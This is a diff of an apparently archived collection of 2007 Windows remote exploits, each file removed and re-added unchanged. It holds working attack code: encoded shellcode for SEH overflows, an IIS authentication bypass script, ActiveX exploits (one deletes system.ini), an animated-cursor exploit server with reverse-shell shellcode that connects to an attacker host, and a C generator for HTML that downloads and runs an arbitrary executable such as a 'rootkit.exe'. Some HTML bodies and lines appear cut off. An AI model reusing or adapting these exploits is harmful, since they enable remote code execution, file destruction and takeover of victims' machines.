+# EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com    
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57"
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58"
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54"
+"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53"
+"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a"
+"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43"
+"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
+"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49"
+"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36"
+"\x4e\x36\x43\x36\x42\x50\x5a")
+
+NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
+SE_HANDLER = 0x7CEA41D3       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
+
+buf = "A" * 1062
+buf += pack("
-
-
-
-
-
-# milw0rm.com [2007-05-31]
+
+
+
+
+
+
+# milw0rm.com [2007-05-31]
diff --git a/platforms/windows/remote/4016.sh b/platforms/windows/remote/4016.sh
index aea8ab91e..3bcb47206 100755
--- a/platforms/windows/remote/4016.sh
+++ b/platforms/windows/remote/4016.sh
@@ -1,19 +1,19 @@
-#!/bin/sh
-#
-# NTLM && BASIC AUTH BYPASS :)
-#
-# sha0[at]badchecksum.net
-# Based on my adv: http://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)
-
-if [ $# != 2 ]
-then
-        printf "USAGE:\t\t$0  \nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
-        exit 0
-fi
-
-site=$1
-protectedObject=$2
-evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
-lynx -dump $evil
-
-# milw0rm.com [2007-05-31]
+#!/bin/sh
+#
+# NTLM && BASIC AUTH BYPASS :)
+#
+# sha0[at]badchecksum.net
+# Based on my adv: http://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)
+
+if [ $# != 2 ]
+then
+        printf "USAGE:\t\t$0  \nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
+        exit 0
+fi
+
+site=$1
+protectedObject=$2
+evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
+lynx -dump $evil
+
+# milw0rm.com [2007-05-31]
diff --git a/platforms/windows/remote/4021.html b/platforms/windows/remote/4021.html
index bc5430948..a62bf5ed5 100755
--- a/platforms/windows/remote/4021.html
+++ b/platforms/windows/remote/4021.html
@@ -1,59 +1,59 @@
-
    -------------------------------------------------------------------------
- Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
- url: http://www.programchecker.com/activeintro.aspx
- 
- original advisory: http://secunia.com/advisories/25473/
- Will Dormann, CERT/CC, is credited with the discovery of these issues
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- Tested on Windows XP Professional SP2 all patched, with Internet
- Explorer 7
-------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-06-01]
+
    +------------------------------------------------------------------------
+ Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
+ url: http://www.programchecker.com/activeintro.aspx
+ 
+ original advisory: http://secunia.com/advisories/25473/
+ Will Dormann, CERT/CC, is credited with the discovery of these issues
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet
+ Explorer 7
+------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-06-01]
diff --git a/platforms/windows/remote/4042.html b/platforms/windows/remote/4042.html
index 6eb1e51d2..58651d1fb 100755
--- a/platforms/windows/remote/4042.html
+++ b/platforms/windows/remote/4042.html
@@ -1,44 +1,44 @@
-
-
-
-
-
-
-sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
-
-# milw0rm.com [2007-06-07]
+
+
+
+
+
+
+sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
+
+# milw0rm.com [2007-06-07]
diff --git a/platforms/windows/remote/4043.html b/platforms/windows/remote/4043.html
index 7f6f6107c..2080b03e2 100755
--- a/platforms/windows/remote/4043.html
+++ b/platforms/windows/remote/4043.html
@@ -1,40 +1,40 @@
-This affects the viewer ywcvwr.dll with yahoo messenger
-  latest version tested.
-  Fixed bug in last post
-  (x=0;xi<800;x++) should be  (x=0; x<800; x++)
-   
-  Here is your 2nd 0day!!!
-  link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 
-   
- 
- 
- 
- 
-
-# milw0rm.com [2007-06-07]
+This affects the viewer ywcvwr.dll with yahoo messenger
+  latest version tested.
+  Fixed bug in last post
+  (x=0;xi<800;x++) should be  (x=0; x<800; x++)
+   
+  Here is your 2nd 0day!!!
+  link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 
+   
+ 
+ 
+ 
+ 
+
+# milw0rm.com [2007-06-07]
diff --git a/platforms/windows/remote/4045.py b/platforms/windows/remote/4045.py
index 0c5a73272..656c362d2 100755
--- a/platforms/windows/remote/4045.py
+++ b/platforms/windows/remote/4045.py
@@ -1,292 +1,292 @@
-#!/usr/bin/env python
-
-#
-#   $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
-#
-#   Windows Animated Cursor Stack Overflow Exploit
-#   Copyright 2007 Ramon de Carvalho Valle ,
-#   RISE Security 
-#
-#   This program is free software; you can redistribute it and/or modify
-#   it under the terms of the GNU General Public License as published by
-#   the Free Software Foundation; either version 2 of the License, or
-#   (at your option) any later version.
-#
-#   This program is distributed in the hope that it will be useful,
-#   but WITHOUT ANY WARRANTY; without even the implied warranty of
-#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-#   GNU General Public License for more details.
-#
-#   You should have received a copy of the GNU General Public License
-#   along with this program; if not, write to the Free Software
-#   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-#
-
-#
-# Windows Animated Cursor Stack Overflow Vulnerability
-# http://www.determina.com/security.research/vulnerabilities/ani-header.html
-#
-
-from BaseHTTPServer import *
-from os.path import *
-from random import *
-from socket import *
-from string import *
-from struct import *
-from sys import *
-
-#
-#  windows/shell_reverse_tcp - 287 bytes
-#  http://www.metasploit.com
-#  EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1
-#
-buf = \
-'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \
-'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \
-'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \
-'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \
-'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \
-'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \
-'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \
-'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \
-'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \
-'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \
-'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \
-'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \
-'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \
-'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \
-'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \
-'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \
-'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \
-'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \
-'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \
-'\xff\xd0'
-
-# Target list
-target = [ \
-    # call [ebx+4]
-
-    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language
-    {'addr': 0x25ba, 'len': 2, 'offset': 80},
-
-    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
-    {'addr': 0x25d0, 'len': 2, 'offset': 80},
-
-    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English
-    {'addr': 0x769fc81a, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English
-    # {'addr': 0x77d825d0, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil)
-    {'addr': 0x769dc81a, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil)
-    # {'addr': 0x77d625d0, 'len': 4, 'offset': 80},
-
-    # call [esi+4]
-
-    # Microsoft Windows XP SP1a userenv.dll English
-    {'addr': 0x75a758b1, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP SP1a shell32.dll English
-    # {'addr': 0x77441a66, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil)
-    {'addr': 0x75a4579b, 'len': 4, 'offset': 80},
-
-    # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil)
-    # {'addr': 0x77427214, 'len': 4, 'offset': 80},
-]
-
-# Target list index
-tidx = 0
-
-def randstr(count = 1, charset = 'ascii_alpha'):
-    # Set the charset
-    if charset == 'ascii_alpha':
-        charset = digits + ascii_uppercase + ascii_lowercase
-    elif charset == 'ascii_letters':
-        charset = ascii_letters
-    elif charset == 'ascii_lowercase':
-        charset = ascii_lowercase
-    elif charset == 'ascii_uppercase':
-        charset = ascii_uppercase
-    elif charset == 'digits':
-        charset = digits
-    elif charset == 'hexdigits':
-        charset = hexdigits
-    elif charset == 'octdigits':
-        charset = octdigits
-
-    # Create the string
-    i = 0
-    str = ''
-
-    while i < count:
-        str = str + charset[randint(0, len(charset)-1)]
-        i = i + 1
-
-    return str
-
-
-def riff_chunk():
-    chunk_id = randstr(4)
-    chunk_data = randstr(randint(1, 256)*2)
-    chunk_size = pack('\n\n' + \
-    randstr(randint(1, 256)) + \
-    '\n\n\n'
-
-    for i in range(randint(0, 4)):
-        html = html + randstr(randint(1, 256)) + '\n'
-
-    for i in range(len(target)):
-        html = html + \
-        '
    \n'
-
-        for i in range(randint(0, 4)):
-            html = html + randstr(randint(1, 256)) + '\n'
-
-        html = html + '
    \n'
-
-        for i in range(randint(0, 4)):
-            html = html + randstr(randint(1, 256)) + '\n'
-
-    html = html + '\n\n'
-
-    return html
-
-
-class RequestHandler(BaseHTTPRequestHandler):
-    def do_GET(self):
-        self.send_response(200)
-
-        if self.path == '/':
-            # Send the html document
-            html = randhtml()
-            self.send_header('Content-Type', 'text/html; charset=UTF-8')
-            self.send_header('Content-Length', str(len(html)))
-            self.end_headers()
-            self.wfile.write(html)
-            return
-
-        # Generate and send the RIFF file
-        riff = riff_ani_file()
-        self.send_header('Content-Type', 'application/octetstream')
-        self.send_header('Content-Length', str(len(riff)))
-        self.end_headers()
-        self.wfile.write(riff)
-
-
-def usage():
-    print 'Usage: ./%s    ' \
-    % basename(argv[0])
-
-
-if __name__ == '__main__':
-    print 'Windows Animated Cursor Stack Overflow Exploit'
-    print 'Copyright 2007 RISE Security \n'
-
-    args = argv[1:]
-
-    if '-h' in args or '--help' in args:
-        usage()
-        exit()
-
-    http_host = '0.0.0.0'
-    http_port = 8080
-    host = '127.0.0.1'
-    port = 1234
-
-    try:
-        http_host = argv[1]
-        http_port = atoi(argv[2])
-        host = argv[3]
-        port = atoi(argv[4])
-    except:
-        pass
-
-    # Set shellcode host and port to connect to
-    buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:]
-    buf = buf[:166] + pack(',
+#   RISE Security 
+#
+#   This program is free software; you can redistribute it and/or modify
+#   it under the terms of the GNU General Public License as published by
+#   the Free Software Foundation; either version 2 of the License, or
+#   (at your option) any later version.
+#
+#   This program is distributed in the hope that it will be useful,
+#   but WITHOUT ANY WARRANTY; without even the implied warranty of
+#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#   GNU General Public License for more details.
+#
+#   You should have received a copy of the GNU General Public License
+#   along with this program; if not, write to the Free Software
+#   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+#
+
+#
+# Windows Animated Cursor Stack Overflow Vulnerability
+# http://www.determina.com/security.research/vulnerabilities/ani-header.html
+#
+
+from BaseHTTPServer import *
+from os.path import *
+from random import *
+from socket import *
+from string import *
+from struct import *
+from sys import *
+
+#
+#  windows/shell_reverse_tcp - 287 bytes
+#  http://www.metasploit.com
+#  EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1
+#
+buf = \
+'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \
+'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \
+'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \
+'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \
+'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \
+'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \
+'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \
+'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \
+'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \
+'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \
+'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \
+'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \
+'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \
+'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \
+'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \
+'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \
+'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \
+'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \
+'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \
+'\xff\xd0'
+
+# Target list
+target = [ \
+    # call [ebx+4]
+
+    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language
+    {'addr': 0x25ba, 'len': 2, 'offset': 80},
+
+    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
+    {'addr': 0x25d0, 'len': 2, 'offset': 80},
+
+    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English
+    {'addr': 0x769fc81a, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English
+    # {'addr': 0x77d825d0, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil)
+    {'addr': 0x769dc81a, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil)
+    # {'addr': 0x77d625d0, 'len': 4, 'offset': 80},
+
+    # call [esi+4]
+
+    # Microsoft Windows XP SP1a userenv.dll English
+    {'addr': 0x75a758b1, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP SP1a shell32.dll English
+    # {'addr': 0x77441a66, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil)
+    {'addr': 0x75a4579b, 'len': 4, 'offset': 80},
+
+    # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil)
+    # {'addr': 0x77427214, 'len': 4, 'offset': 80},
+]
+
+# Target list index
+tidx = 0
+
+def randstr(count = 1, charset = 'ascii_alpha'):
+    # Set the charset
+    if charset == 'ascii_alpha':
+        charset = digits + ascii_uppercase + ascii_lowercase
+    elif charset == 'ascii_letters':
+        charset = ascii_letters
+    elif charset == 'ascii_lowercase':
+        charset = ascii_lowercase
+    elif charset == 'ascii_uppercase':
+        charset = ascii_uppercase
+    elif charset == 'digits':
+        charset = digits
+    elif charset == 'hexdigits':
+        charset = hexdigits
+    elif charset == 'octdigits':
+        charset = octdigits
+
+    # Create the string
+    i = 0
+    str = ''
+
+    while i < count:
+        str = str + charset[randint(0, len(charset)-1)]
+        i = i + 1
+
+    return str
+
+
+def riff_chunk():
+    chunk_id = randstr(4)
+    chunk_data = randstr(randint(1, 256)*2)
+    chunk_size = pack('\n\n' + \
+    randstr(randint(1, 256)) + \
+    '\n\n\n'
+
+    for i in range(randint(0, 4)):
+        html = html + randstr(randint(1, 256)) + '\n'
+
+    for i in range(len(target)):
+        html = html + \
+        '
    \n'
+
+        for i in range(randint(0, 4)):
+            html = html + randstr(randint(1, 256)) + '\n'
+
+        html = html + '
    \n'
+
+        for i in range(randint(0, 4)):
+            html = html + randstr(randint(1, 256)) + '\n'
+
+    html = html + '\n\n'
+
+    return html
+
+
+class RequestHandler(BaseHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(200)
+
+        if self.path == '/':
+            # Send the html document
+            html = randhtml()
+            self.send_header('Content-Type', 'text/html; charset=UTF-8')
+            self.send_header('Content-Length', str(len(html)))
+            self.end_headers()
+            self.wfile.write(html)
+            return
+
+        # Generate and send the RIFF file
+        riff = riff_ani_file()
+        self.send_header('Content-Type', 'application/octetstream')
+        self.send_header('Content-Length', str(len(riff)))
+        self.end_headers()
+        self.wfile.write(riff)
+
+
+def usage():
+    print 'Usage: ./%s    ' \
+    % basename(argv[0])
+
+
+if __name__ == '__main__':
+    print 'Windows Animated Cursor Stack Overflow Exploit'
+    print 'Copyright 2007 RISE Security \n'
+
+    args = argv[1:]
+
+    if '-h' in args or '--help' in args:
+        usage()
+        exit()
+
+    http_host = '0.0.0.0'
+    http_port = 8080
+    host = '127.0.0.1'
+    port = 1234
+
+    try:
+        http_host = argv[1]
+        http_port = atoi(argv[2])
+        host = argv[3]
+        port = atoi(argv[4])
+    except:
+        pass
+
+    # Set shellcode host and port to connect to
+    buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:]
+    buf = buf[:166] + pack('
------------------------------------------------------------------------------
- Zenturi ProgramChecker ActiveX Control Multiple Insecure Methods
- url: http://www.programchecker.com/activeintro.aspx
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-06-08]
+
    +-----------------------------------------------------------------------------
+ Zenturi ProgramChecker ActiveX Control Multiple Insecure Methods
+ url: http://www.programchecker.com/activeintro.aspx
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-06-08]
diff --git a/platforms/windows/remote/4050.html b/platforms/windows/remote/4050.html
index 1d0805672..14d95a29f 100755
--- a/platforms/windows/remote/4050.html
+++ b/platforms/windows/remote/4050.html
@@ -1,38 +1,38 @@
-
    ------------------------------------------------------------------------------
- Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method
- 
- url: http://www.programchecker.com/activeintro.aspx
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- I can't believe my eyes when I see what you can do with this ActiveX
- (and I can't believe that this product is considered as antispyware).
- You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
- Try, for example, to launch "c:\somefile.exe" and see what happen.
- Imagine to use this method with the "DownloadFile()" one, you can download
- something on the pc and run it without problems.
- For the "DownloadFile()" vulnerability see:
- http://www.milw0rm.com/exploits/4008
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-06-08]
+
    +-----------------------------------------------------------------------------
+ Zenturi ProgramChecker ActiveX Control "NavigateUrl()" Insecure Method
+ 
+ url: http://www.programchecker.com/activeintro.aspx
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ I can't believe my eyes when I see what you can do with this ActiveX
+ (and I can't believe that this product is considered as antispyware).
+ You can use the "NavigateUrl()" to arbitrary launch local file from a pc.
+ Try, for example, to launch "c:\somefile.exe" and see what happen.
+ Imagine to use this method with the "DownloadFile()" one, you can download
+ something on the pc and run it without problems.
+ For the "DownloadFile()" vulnerability see:
+ http://www.milw0rm.com/exploits/4008
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-06-08]
diff --git a/platforms/windows/remote/4052.c b/platforms/windows/remote/4052.c
index 62a018198..b54ca9ed0 100755
--- a/platforms/windows/remote/4052.c
+++ b/platforms/windows/remote/4052.c
@@ -1,144 +1,144 @@
-/* 
-  Compile in LCC-win32 (Free!)
-  Download and exec any file you like!
-  Have Fun!
-  */ 
-   
-#include 
-#include 
-#include 
-char *file = "Click_here.html";
-FILE *fp = NULL;
-   
-  unsigned char sc[] =
-  "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
-   
-  
-char *url = NULL;
-unsigned char sc_2[] = "\x00\x98";
-  
-char * header =
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n";
-  
-// print unicode shellcode
-void PrintPayLoad(char *lpBuff, int buffsize)
-{
-int i;
-for(i=0;i [htmlfile]\n", argv[0]);
- printf("\r\nE.g.: %s http://www.malwarehere.com/rootkit.exe exploit.html\r\n\n", argv[0]);
- printf("=-Excepti0n-=\n");
- exit(1);
-}
-  url = argv[1];
-  
-if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
-{
-printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-return;
-}
-  printf("[+] download url:%s\n", url);
-  if(argc >=3) file = argv[2];
-printf("[+] exploit file:%s\n", file);
-  fp = fopen(file, "w");
-if(!fp)
-{
-printf("[-] Open file error!\n");
-return;
-}
-  
-//build Exploit HTML File
-fprintf(fp, "%s", header);
-fflush(fp);
-  memset(buf, 0, sizeof(buf));
-sc_len = sizeof(sc)-1;
-memcpy(buf, sc, sc_len);
-memcpy(buf+sc_len, url, strlen(url));
-  sc_len += strlen(url);
-  memcpy(buf+sc_len, sc_2, 1);
-sc_len += 1;
-  PrintPayLoad((char *)buf, sc_len);
-  fprintf(fp, "%s", footer);
-fflush(fp);
-  fprintf(fp, "%s", trigger_1);
-fflush(fp);
-  
-printf("[+] exploit write to %s success!\n", file);
-}
-  
-// =-Excepti0n-= 
-
-// milw0rm.com [2007-06-08]
+/* 
+  Compile in LCC-win32 (Free!)
+  Download and exec any file you like!
+  Have Fun!
+  */ 
+   
+#include 
+#include 
+#include 
+char *file = "Click_here.html";
+FILE *fp = NULL;
+   
+  unsigned char sc[] =
+  "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
